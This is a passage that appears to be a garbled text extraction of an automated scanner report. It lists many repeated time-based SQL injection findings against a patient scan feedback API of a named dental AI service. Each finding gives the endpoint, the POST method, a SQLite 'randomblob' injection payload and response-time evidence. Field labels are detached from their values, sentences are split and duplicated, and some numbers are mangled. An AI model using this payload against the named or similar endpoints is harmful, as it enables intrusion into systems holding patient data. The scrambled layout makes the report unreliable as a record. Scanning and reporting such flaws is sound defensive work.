The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,324] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,032] milliseconds, when the original unmodified query with value [700] took

[2,318] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,356] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,196] milliseconds, when the original unmodified query with value [322] took

[2,122] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,356] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,196] milliseconds, when the original unmodified query with value [322] took

[2,122] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor feedback

POST Method

Attack

case randomblob(1000000) when not null then 1 else 1 end

Other

Info

Evidence

Method

Evidence

Other Info

Method

Attack

Evidence

Other Info

Evidence

Other Info

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,375] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,390] milliseconds, when the original unmodified query with value [1538] took [4,124] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,375] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,390] milliseconds, when the original unmodified query with value [1538] took [4,124] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,440] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [4.418] milliseconds, when the original unmodified query with value [0] took

[4,353] milliseconds.

Other Info

Evidence

Other

Evidence

Other

Info

Info

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,440] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [4,418] milliseconds, when the original unmodified query with value [0] took [4,353] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(1000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,476] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [8,123] milliseconds, when the original unmodified query with value [222] took

[2,004] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,476] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [8,123] milliseconds, when the original unmodified query with value [222] took

[2,004] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(1000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,500] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,996] milliseconds, when the original unmodified query with value [800] took

[1,267] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,500] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,996] milliseconds, when the original unmodified query with value [800] took

[1,267] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(1000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,534] milliseconds, parameter

Evidence

value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,894] milliseconds, when the original unmodified query with value [317] took [3,062] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,534] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,894] milliseconds, when the original unmodified query with value [317] took [3,062] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,541] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,930] milliseconds, when the original unmodified query with value [295] took [1,488] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,541] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,930] milliseconds, when the original unmodified query with value [295] took [1,488] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,566] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,800] milliseconds, when the original unmodified query with value [183] took

[1,276] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,566] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,800] milliseconds, when the original unmodified query with value [183] took [1,276] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

URL

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,593] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [4,879] milliseconds, when the original unmodified query with value [226] took [1,544] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,593] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [4,879] milliseconds, when the original unmodified query with value [226] took [1,544] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save doctor feedback

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,635] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,955] milliseconds, when the original unmodified query with value [252] took

[2,807] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,635] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,955] milliseconds, when the original unmodified query with value [252] took [2,807] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(1000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,648] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [4,158] milliseconds, when the original unmodified query with value [147] took

[2,299] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,648] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [4,158] milliseconds, when the original unmodified query with value [147] took

[2,299] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,760] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [6,200] milliseconds, when the original unmodified query with value [580] took

[1,415] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,760] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [6,200] milliseconds, when the original unmodified query with value [580] took

[1,415] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(1000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,776] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,156] milliseconds, when the original unmodified query with value [229] took

[2,759] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,776] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,156] milliseconds, when the original unmodified query with value [229] took

[2,759] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(1000000) when not null then 1 else 1 end

> null then 1 else 1 end], which caused the request to take [1,789] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,835] milliseconds, when the original unmodified query with value [366] took

The query time is controllable using parameter value [case randomblob(1000000) when not

[1,515] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,789] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the

request to take [2,835] milliseconds, when the original unmodified query with value [366]

took [1,515] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback URL

POST Method

Other Info

Evidence

Method

Evidence

Other Info

Evidence

Other

Info

Evidence

Other

Info

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,792] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,833] milliseconds, when the original unmodified query with value [244] took

[1,601] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,792] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,833] milliseconds, when the original unmodified query with value [244] took

[1,601] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

case randomblob(1000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,824] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,971] milliseconds, when the original unmodified query with value [239] took

[3,830] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,824] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,971] milliseconds, when the original unmodified query with value [239] took [3,830] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

case randomblob(1000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,929] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,941] milliseconds, when the original unmodified query with value [287] took

[2,656] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,929] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,941] milliseconds, when the original unmodified query with value [287] took

[2,656] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,948] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [5,161] milliseconds, when the original unmodified query with value [761] took

[1,198] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,948] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [5,161] milliseconds, when the original unmodified query with value [761] took

[1,198] milliseconds.

https://api.velmeni.ai/api/patient/scan/save doctor feedback

Method

Other

Info

Evidence

Evidence

Other Info

URL

Method

Evidence

Other Info

Evidence

Other Info

URL

Method **POST**

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,007] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,160] milliseconds, when the original unmodified query with value [510] took

[2,979] milliseconds.

The guery time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,007] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,160] milliseconds, when the original unmodified query with value [510] took

[2,979] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,073] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [4,173] milliseconds, when the original unmodified query with value [510] took

[3,408] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,073] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [4,173] milliseconds, when the original unmodified query with value [510] took

[3,408] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,143] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,283] milliseconds, when the original unmodified query with value [517] took

[1,429] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,143] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,283] milliseconds, when the original unmodified query with value [517] took

[1,429] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,150] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,155] milliseconds, when the original unmodified query with value [451] took

[2,610] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,150] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,155] milliseconds, when the original unmodified query with value [451] took

[2,610] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(1000000) when not null then 1 else 1 end

Other

Info

Evidence

Method

Evidence

Other Info

Method

Attack

Evidence

Other Info

Evidence

Other Info

Attack

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,225] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,315] milliseconds, when the original unmodified query with value [785] took [3,304] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,225] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,315] milliseconds, when the original unmodified query with value [785] took [3,304] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,248] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,705] milliseconds, when the original unmodified query with value [856] took [2,083] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,248] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,705] milliseconds, when the original unmodified query with value [856] took [2,083] milliseconds.

Info

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,410] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [5,436] milliseconds, when the original unmodified query with value [31] took [3,066] milliseconds.

Other

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,410] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [5,436] milliseconds, when the original unmodified query with value [31] took [3,066] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(1000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,468] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [6,004] milliseconds, when the original unmodified query with value [441] took

[2,224] milliseconds.

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,468] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [6,004] milliseconds, when the original unmodified query with value [441] took [2,224] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(1000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,643] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the

Evidence

Other

Evidence

Evidence

Info

Other Info

URL

request to take [3,566] milliseconds, when the original unmodified guery with value [829] took [2,129] milliseconds.

The guery time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,643] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,566] milliseconds, when the original unmodified query with value [829] took

[2,129] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,669] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,912] milliseconds, when the original unmodified query with value [778] took

[1,212] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,669] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,912] milliseconds, when the original unmodified query with value [778] took

[1,212] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

case randomblob(1000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,775] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,871] milliseconds, when the original unmodified query with value [1555]

took [1,412] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,775] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,871] milliseconds, when the original unmodified query with value [1555]

took [1,412] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,810] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [5,510] milliseconds, when the original unmodified query with value [512] took

[1,888] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,810] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [5,510] milliseconds, when the original unmodified query with value [512] took

[1,888] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,911] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [5,316] milliseconds, when the original unmodified query with value [324] took

[867] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not

Other

Evidence

Other

Info

Info

Method

Evidence

Other Info

Evidence

Other Info

Other Info

null then 1 else 1 end], which caused the request to take [2,911] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [5.316] milliseconds, when the original unmodified query with value [324]

took [867] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,940] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [4,039] milliseconds, when the original unmodified query with value [356] took

[3,070] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,940] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [4,039] milliseconds, when the original unmodified query with value [356] took [3,070] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,964] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,175] milliseconds, when the original unmodified query with value [336] took

[2,333] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,964] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,175] milliseconds, when the original unmodified query with value [336] took [2,333] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

URL

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [268] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,296] milliseconds, when the original unmodified query with value [1201]

took [258] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [268] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,296] milliseconds, when the original unmodified query with value [1201] took [258] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [351] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [652] milliseconds, when the original unmodified query with value [1550] took

[925] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [351] milliseconds, parameter

Other

Info value [case randomblob(10000000) when not null then 1 else 1 end], which caused the

request to take [652] milliseconds, when the original unmodified query with value [1550]

took [925] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Evidence

Other

Evidence

Other

Evidence

Other

Evidence

Other

Info

Info

Info

Info

Attack case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [367] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [787] milliseconds, when the original unmodified query with value [336] took

[4,960] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [367] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [787] milliseconds, when the original unmodified query with value [336] took

[4,960] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [516] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [783] milliseconds, when the original unmodified query with value [458] took

[902] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [516] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [783] milliseconds, when the original unmodified query with value [458] took

[902] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor-feedback

Method POST

Attack case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [749] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,965] milliseconds, when the original unmodified query with value [321] took

[1,119] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [749] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,965] milliseconds, when the original unmodified guery with value [321] took

[1,119] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [770] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [774] milliseconds, when the original unmodified query with value

[652.7058823529411] took [1,384] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [770] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [774] milliseconds, when the original unmodified query with value

[652.7058823529411] took [1,384] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [782] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,053] milliseconds, when the original unmodified query with value [706] took

[784] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [782] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,053] milliseconds, when the original unmodified query with value [706] took

[784] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [831] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,576] milliseconds, when the original unmodified query with value [458] took

[3,015] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [831] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,576] milliseconds, when the original unmodified query with value [458] took [3,015] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [846] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [5,937] milliseconds, when the original unmodified query with value [344] took

[1,582] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [846] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [5,937] milliseconds, when the original unmodified query with value [344] took

[1,582] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [866] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,148] milliseconds, when the original unmodified query with value [363] took

[1,566] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [866] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,148] milliseconds, when the original unmodified query with value [363] took

[1,566] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor feedback

POST Method

Attack

case randomblob(1000000) when not null then 1 else 1 end

Other

Info

Evidence

Attack

Evidence

Other

Info

URL

Attack

Evidence

Other Info

Evidence

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [917] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,164] milliseconds, when the original unmodified query with value [336] took [1,722] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [917] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,164] milliseconds, when the original unmodified query with value [336] took

[1,722] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [928] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,085] milliseconds, when the original unmodified guery with value [1069]

took [1,642] milliseconds.

Other

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [928] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,085] milliseconds, when the original unmodified query with value [1069]

took [1,642] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

case randomblob(1000000) when not null then 1 else 1 end Attack

